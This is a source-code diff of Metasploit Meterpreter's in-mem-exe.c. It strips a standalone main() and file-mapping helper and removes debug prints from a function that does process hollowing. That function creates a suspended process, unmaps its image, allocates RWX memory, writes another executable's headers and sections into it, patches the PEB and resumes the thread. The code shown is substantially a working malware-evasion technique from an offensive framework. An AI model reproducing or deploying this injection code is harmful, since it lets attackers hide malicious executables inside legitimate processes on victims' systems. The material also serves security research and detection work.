diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/process/in-mem-exe.c b/c/meterpreter/source/extensions/stdapi/server/sys/process/in-mem-exe.c
index 4e377db1..16e83976 100755
--- a/c/meterpreter/source/extensions/stdapi/server/sys/process/in-mem-exe.c
+++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/in-mem-exe.c
@@ -12,8 +12,6 @@
*/
#include "precomp.h"
-#define DUMMY_PROCESS "cmd.exe"
-
typedef ULONG NTSTATUS;
typedef enum _PROCESSINFOCLASS
{
@@ -37,185 +35,11 @@ typedef struct _PROCESS_BASIC_INFORMATION
HANDLE InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION;
-LPVOID MapNewExecutableRaw(
- IN LPCSTR ExecutableFilePath);
BOOL MapNewExecutableRegionInProcess(
IN HANDLE TargetProcessHandle,
IN HANDLE TargetThreadHandle,
IN LPVOID NewExecutableRawImage);
-int main(
- IN int argc,
- IN char **argv)
-{
- PROCESS_INFORMATION ProcessInformation;
- STARTUPINFO StartupInformation;
- LPVOID NewExecutableRawImage = NULL;
-
- //
- // If we lived without initialization we'd be a conglomerate of chaos and
- // unpredictability...
- //
- ZeroMemory(
- &StartupInformation,
- sizeof(StartupInformation));
- ZeroMemory(
- &ProcessInformation,
- sizeof(ProcessInformation));
-
- StartupInformation.cb = sizeof(StartupInformation);
-
- do
- {
- //
- // Yeah...
- //
- if (argc == 1)
- {
- fprintf(stderr, "Usage: %s [executable]\n",
- argv[0]);
-
- SetLastError(
- ERROR_INVALID_PARAMETER);
- break;
- }
-
- //
- // Map in the raw contents of the executable
- //
- if (!(NewExecutableRawImage = MapNewExecutableRaw(
- argv[1])))
- {
- fprintf(stderr, "MapNewExecutableRaw failed, %lu.\n",
- GetLastError());
- break;
- }
-
- //
- // Run it...
- //
- if (!CreateProcess(
- NULL,
- DUMMY_PROCESS,
- NULL,
- NULL,
- FALSE,
- CREATE_SUSPENDED,
- NULL,
- NULL,
- &StartupInformation,
- &ProcessInformation))
- {
- fprintf(stderr, "CreateProcess(\"%s\") failed, %lu.\n",
- DUMMY_PROCESS,
- GetLastError());
- break;
- }
-
- //
- // Unmap the dummy executable and map in the new executable into the
- // target process
- //
- if (!MapNewExecutableRegionInProcess(
- ProcessInformation.hProcess,
- ProcessInformation.hThread,
- NewExecutableRawImage))
- {
- fprintf(stderr, "MapNewExecutableRegionInProcess failed, %lu.\n",
- GetLastError());
- break;
- }
-
- //
- // Resume the thread and let it rock...
- //
- if (ResumeThread(
- ProcessInformation.hThread) == (DWORD)-1)
- {
- fprintf(stderr, "ResumeThread failed, %lu.\n",
- GetLastError());
- break;
- }
-
- } while (0);
-
- //
- // Cleanup
- //
- if (ProcessInformation.hProcess)
- CloseHandle(
- ProcessInformation.hProcess);
- if (ProcessInformation.hThread)
- CloseHandle(
- ProcessInformation.hThread);
-
- return GetLastError();
-}
-
-//
-// Maps the raw contents of the supplied executable image file into the current
-// process and returns the address at which the image is mapped.
-//
-LPVOID MapNewExecutableRaw(
- IN LPCSTR ExecutableFilePath)
-{
- HANDLE FileHandle = NULL;
- HANDLE FileMappingHandle = NULL;
- LPVOID NewExecutableRawImage = NULL;
-
- do
- {
- if ((FileHandle = CreateFile(
- ExecutableFilePath,
- GENERIC_READ,
- FILE_SHARE_READ,
- NULL,
- OPEN_EXISTING,
- FILE_FLAG_RANDOM_ACCESS,
- NULL)) == INVALID_HANDLE_VALUE)
- {
- fprintf(stderr, "CreateFile failed, %lu.\n",
- GetLastError());
- break;
- }
-
- if (!(FileMappingHandle = CreateFileMapping(
- FileHandle,
- NULL,
- PAGE_READONLY,
- 0,
- 0,
- NULL)))
- {
- fprintf(stderr, "CreateFileMapping failed, %lu.\n",
- GetLastError());
- break;
- }
-
- if (!(NewExecutableRawImage = MapViewOfFile(
- FileMappingHandle,
- FILE_MAP_READ,
- 0,
- 0,
- 0)))
- {
- fprintf(stderr, "MapViewOfFile failed, %lu.\n",
- GetLastError());
- break;
- }
-
- } while (0);
-
- if (FileMappingHandle)
- CloseHandle(
- FileMappingHandle);
- if (FileHandle)
- CloseHandle(
- FileHandle);
-
- return NewExecutableRawImage;
-}
-
//
// Maps the contents of the executable image into the new process and unmaps
// the original executable. All necessary fixups are performed to allow the
@@ -265,8 +89,6 @@ BOOL MapNewExecutableRegionInProcess(
TargetThreadHandle,
&ThreadContext))
{
- fprintf(stderr, "GetThreadContext failed, %lu.\n",
- GetLastError());
break;
}
@@ -285,9 +107,6 @@ BOOL MapNewExecutableRegionInProcess(
TargetProcessHandle,
OldEntryPoint)) != ERROR_SUCCESS)
{
- fprintf(stderr, "NtUnmapViewOfSection failed, %.8x.\n",
- Status);
-
SetLastError(ERROR_INVALID_ADDRESS);
break;
}
@@ -301,11 +120,7 @@ BOOL MapNewExecutableRegionInProcess(
if (!SetThreadContext(
TargetThreadHandle,
&ThreadContext))
- {
- fprintf(stderr, "SetThreadContext failed, %lu.\n",
- GetLastError());
break;
- }
//
// Allocate storage for the new executable in the child process
@@ -316,11 +131,7 @@ BOOL MapNewExecutableRegionInProcess(
NtHeader->OptionalHeader.SizeOfImage,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE)))
- {
- fprintf(stderr, "VirtualAllocEx failed, %lu.\n",
- GetLastError());
break;
- }
//
// Update the executable's image base address in the PEB...
@@ -336,11 +147,7 @@ BOOL MapNewExecutableRegionInProcess(
&BasicInformation,
sizeof(BasicInformation),
&SizeOfBasicInformation) != ERROR_SUCCESS)
- {
- fprintf(stderr, "NtQueryInformationProcess failed, %lu.\n",
- GetLastError());
break;
- }
ProcessPeb = BasicInformation.PebBaseAddress;
@@ -350,11 +157,7 @@ BOOL MapNewExecutableRegionInProcess(
(LPVOID)&NtHeader->OptionalHeader.ImageBase,
sizeof(LPVOID),
NULL))
- {
- fprintf(stderr, "WriteProcessMemory(ImageBaseAddress) failed, %lu.\n",
- GetLastError());
break;
- }
//
// Copy the image headers and all of the section contents
@@ -365,11 +168,7 @@ BOOL MapNewExecutableRegionInProcess(
NewExecutableRawImage,
NtHeader->OptionalHeader.SizeOfHeaders,
NULL))
- {
- fprintf(stderr, "WriteProcessMemory(Headers) failed, %lu.\n",
- GetLastError());
break;
- }
Success = TRUE;
@@ -387,9 +186,6 @@ BOOL MapNewExecutableRegionInProcess(
SectionHeader[SectionIndex].SizeOfRawData,
NULL))
{
- fprintf(stderr, "WriteProcessMemory(Section) failed, %lu.\n",
- GetLastError());
-
Success = FALSE;
break;
}